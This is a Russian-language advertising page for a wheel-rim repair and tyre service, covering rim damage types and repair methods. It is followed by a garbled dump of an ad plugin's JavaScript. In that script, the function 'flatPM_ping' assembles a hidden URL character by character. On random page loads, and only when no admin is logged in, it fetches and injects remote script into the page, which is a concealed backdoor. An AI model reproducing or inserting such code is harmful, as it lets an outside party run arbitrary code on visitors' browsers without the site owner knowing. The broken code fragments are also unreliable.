    Ремонт и реставрация автодисков. Шиномонтаж.

    Колеса автомобиля первыми испытывают неприятности, связанные с плохим дорожным покрытием и его многочисленными выбоинами, буграми, а также с неаккуратным стилем вождения. Кроме того, колесные диски подвержены неблагоприятному воздействию атмосферных явлений, химических веществ и механических повреждений.

    Как бы то ни было, через время ремонт дисков требуется любому автомобилю. Бывают такие ситуации, когда автовладельцы берутся за восстановление колес в гаражных условиях. Однако обратиться в специализированный автосервис для профессиональной реставрации колесных дисков – наиболее надежное и оптимальное решение.

    Виды повреждений дисков, поддающиеся исправлению

    Любые диски нуждаются в ремонте, если на них есть такие дефекты, как:

    • царапины;
    • нарушение защитного слоя краски;
    • трещины;
    • сколы;
    • вмятины;
    • осевое или радиальное смещение;
    • утрата фрагмента.

    Только грамотный специалист после проведения тщательной диагностики может с уверенностью дать заключение – возможно ли осуществить восстановление дисков авто или нет.

    Виды ремонта автомобильных дисков

    Современное оборудование и новейшие технологии позволяют специалистам нашего сервиса выполнять такие виды ремонта и восстановления колесных дисков автомобиля:

    • Прокатка штампованных дисков. Она актуальна только для изделий из стали и представляет собой выравнивание окружности диска на специальном станке.
    • Рихтовка литых дисков. Ее выполняют с помощью профессионального оборудования, предназначенного для исправления геометрии именно легкосплавных дисков.
    • Аргонная сварка дисков. Она способна полностью восстановить целостность литого диска и усилить его прочность в местах повреждения, устранить полученные дефекты и придать приятный внешний вид колесу.
    • Порошковая покраска дисков. Очень важна для любых дисков после восстановления их геометрии как завершающий этап ремонта. Краска способна защитить колеса от легких механических повреждений и неблагоприятного воздействия осадков и химреактивов на очень длительный срок.

    Особенности ремонта штампованных дисков

    Под ремонтом штампованных дисков понимают их прокатку. Сталь – очень пластичный материал, поэтому первоначальный вид диску можно придать с помощью его правки на специальном роликовом станке. Она выполняется высококвалифицированными мастерами, поскольку важным моментом в процесс является правильная установка диска, чтобы исключить дополнительные изгибы и повреждения, а также не испортить кромку.

    Особенности ремонта литых дисков

    Ремонт автодисков из алюминия при наличии царапин на ободе специалисты выполняют с помощью специальных проникающих средств, шлифовки и порошковой покраски для создания надежного защитного слоя. Если же нужно исправить вмятину, тогда используется специальное оборудование и инструменты – сначала производится выравнивание диска, потом устранение радиального и осевого смещения. Здесь важен контроль каждого этапа и точность выполнения работ.

    Реставрация дисков автомобиля при получении трещин, сколов и выбитых фрагментов происходит методом аргонной сварки. Однако такие повреждения, как трещины на спицах или возле отверстий для крепления колес, ремонту не подлежат, потому что никто не сможет дать гарантию, что колесо не расколется на большой скорости. Только мастер может определить всю серьезность повреждения.

    Особенности ремонта кованых дисков

    Кованые диски – самые надежные и прочные по сравнению со штампованными и литыми. Они реже всех подвергаются повреждениям, поскольку даже при неаккуратной езде вся сила удара передается подвеске машины. Хоть и редко, однако и они бывают с трещинами и сколами. Для реставрации колес автомобиля с коваными дисками требуется специальное оборудование и высококвалифицированный мастер с опытом работы.

    Компания «Диско-Крас» готова выполнить ремонт колесных дисков любой сложности в кратчайшие сроки. Грамотные специалисты, инновационное оборудование, современные технологии, доступные цены на восстановление колес в наших шиномонтажах в Москве и Люберцах – вот то, что выгодно отличает нас от конкурентов. Обращайтесь!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика